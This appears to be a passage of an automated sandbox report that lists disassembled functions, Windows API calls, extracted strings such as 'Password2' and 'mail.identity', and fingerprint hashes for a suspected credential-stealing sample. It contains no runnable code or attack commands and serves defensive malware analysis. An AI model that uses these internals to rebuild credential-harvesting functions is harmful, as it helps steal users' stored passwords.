                                                            • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                            • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                            • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                            • String ID: MS Sans Serif
                                                            • API String ID: 3492281209-168460110
                                                            • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                            • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                            • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                            • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                            Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ClassName_strcmpimemset
                                                            • String ID: edit
                                                            • API String ID: 275601554-2167791130
                                                            • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                            • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                            • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                            • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                            Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: strlen$_mbscat
                                                            • String ID: 3CD
                                                            • API String ID: 3951308622-1938365332
                                                            • Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                            • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                            • Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                            • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                            Function 00443C44 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscat$_mbscpy
                                                            • String ID: Password2
                                                            • API String ID: 2600922555-1856559283
                                                            • Opcode ID: de5dfba976b8437d2c47849deb952c43e7b11cdba93a79face7e306b42b81b64
                                                            • Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
                                                            • Opcode Fuzzy Hash: de5dfba976b8437d2c47849deb952c43e7b11cdba93a79face7e306b42b81b64
                                                            • Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF
                                                            Function 00410D0E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,75D50A60,?,00000000), ref: 00410D1C
                                                            • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                            • API String ID: 2574300362-543337301
                                                            • Opcode ID: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                            • Instruction ID: ef400fb4b1d3fc6097741d3c7ce2aeca37e2dca3c44752f23935f4d935815712
                                                            • Opcode Fuzzy Hash: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                            • Instruction Fuzzy Hash: C9D0C9F8D063099AE7005BA1AD297167AB4E719312F041536A540A5263EBBCD094CE1D
                                                            Function 004326AD Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 475COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: rows deleted
                                                            • API String ID: 2221118986-571615504
                                                            • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                            • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                            • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                            • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                            Function 0041BC6C Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                                            • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
                                                            • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BCA4
                                                            • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041BCEC
                                                            • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memcmp
                                                            • String ID:
                                                            • API String ID: 3384217055-0
                                                            • Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                            • Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
                                                            • Opcode Fuzzy Hash: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                            • Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765
                                                            Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                            • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                            • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@$memset
                                                            • String ID:
                                                            • API String ID: 1860491036-0
                                                            • Opcode ID: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                            • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                            • Opcode Fuzzy Hash: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                            • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                            Function 00404888 Relevance: 6.3, APIs: 5, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 004048C2
                                                            • memset.MSVCRT ref: 004048D6
                                                            • memset.MSVCRT ref: 004048EA
                                                            • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                            • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$memcpy
                                                            • String ID:
                                                            • API String ID: 368790112-0
                                                            • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                            • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                            • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                            • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                            Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0040D2C2
                                                            • memset.MSVCRT ref: 0040D2D8
                                                            • memset.MSVCRT ref: 0040D2EA
                                                            • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                            • memset.MSVCRT ref: 0040D319
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$memcpy
                                                            • String ID:
                                                            • API String ID: 368790112-0
                                                            • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                            • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                            • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                            • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                            Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            • too many SQL variables, xrefs: 0042C6FD
                                                            • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                            • API String ID: 2221118986-515162456
                                                            • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                            • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                            • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                            • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                            Function 0042FF31 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 144COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.MSVCRT(00000000,?,00000000), ref: 0043007E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: $, $CREATE TABLE
                                                            • API String ID: 3510742995-3459038510
                                                            • Opcode ID: ec2d01fe33c012397d4d1731dfc45432bb5b9ee0a9ad26789851577151ff7e1c
                                                            • Instruction ID: b8263f634f048474639948e4306e081d81924a11902ad0262d34aeb61c893b0c
                                                            • Opcode Fuzzy Hash: ec2d01fe33c012397d4d1731dfc45432bb5b9ee0a9ad26789851577151ff7e1c
                                                            • Instruction Fuzzy Hash: C351A472D00129DFCF10CF94D541AAFB7F4EF49319F61406BE840EB205E778AA4A8B98
                                                            Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                            • memset.MSVCRT ref: 004026AD
                                                              • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                              • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                              • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                              • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                            • LocalFree.KERNEL32(?), ref: 004027A6
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                            • String ID:
                                                            • API String ID: 3503910906-0
                                                            • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                            • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                            • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                            • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                            Function 0040C8B8 Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0040C922
                                                            • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                            • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                            • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Message$MenuPostSendStringmemset
                                                            • String ID:
                                                            • API String ID: 3798638045-0
                                                            • Opcode ID: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
                                                            • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                            • Opcode Fuzzy Hash: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
                                                            • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                            Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
                                                              • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
                                                            • strlen.MSVCRT ref: 0040B60B
                                                            • atoi.MSVCRT(?,00000000,?,75D50A60,?,00000000), ref: 0040B619
                                                            • _mbsicmp.MSVCRT ref: 0040B66C
                                                            • _mbsicmp.MSVCRT ref: 0040B67F
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbsicmp$??2@??3@atoistrlen
                                                            • String ID:
                                                            • API String ID: 4107816708-0
                                                            • Opcode ID: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                            • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                            • Opcode Fuzzy Hash: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                            • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                            Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: strlen
                                                            • String ID: >$>$>
                                                            • API String ID: 39653677-3911187716
                                                            • Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                            • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                            • Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                            • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                            Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                            • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                            • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: @
                                                            • API String ID: 3510742995-2766056989
                                                            • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                            • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                            • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                            • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                            Function 00407FA4 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,0040140F,?,?,?,?,00454020,0000000C), ref: 00407FD9
                                                            • memset.MSVCRT ref: 00407FEA
                                                            • memcpy.MSVCRT(0045791C,?,00000000,00000000,00000000,00000000,00000000,?,?,0040140F,?,?,?,?,00454020,0000000C), ref: 00407FF6
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 00408003
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@??3@memcpymemset
                                                            • String ID:
                                                            • API String ID: 1865533344-0
                                                            • Opcode ID: d43597cadd8799b6ce799edf9af806d1227b00376f30c5f12f51dca381150f40
                                                            • Instruction ID: b86030d1d6bc714dc1ef3b289d30c8af6c7ebcab3ecced31442563250122d8c5
                                                            • Opcode Fuzzy Hash: d43597cadd8799b6ce799edf9af806d1227b00376f30c5f12f51dca381150f40
                                                            • Instruction Fuzzy Hash: 9D116A752046019FE328DF19C881B26F7E5FFD8300B21882EE5DA97385DA35E801CB64
                                                            Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _strcmpi
                                                            • String ID: C@$mail.identity
                                                            • API String ID: 1439213657-721921413
                                                            • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                            • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                            • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                            • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                            Function 00410F10 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SHGetMalloc.SHELL32(?), ref: 00410F20
                                                            • SHBrowseForFolder.SHELL32(?), ref: 00410F52
                                                            • SHGetPathFromIDList.SHELL32(00000000,?), ref: 00410F66
                                                            • _mbscpy.MSVCRT(?,?), ref: 00410F79
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
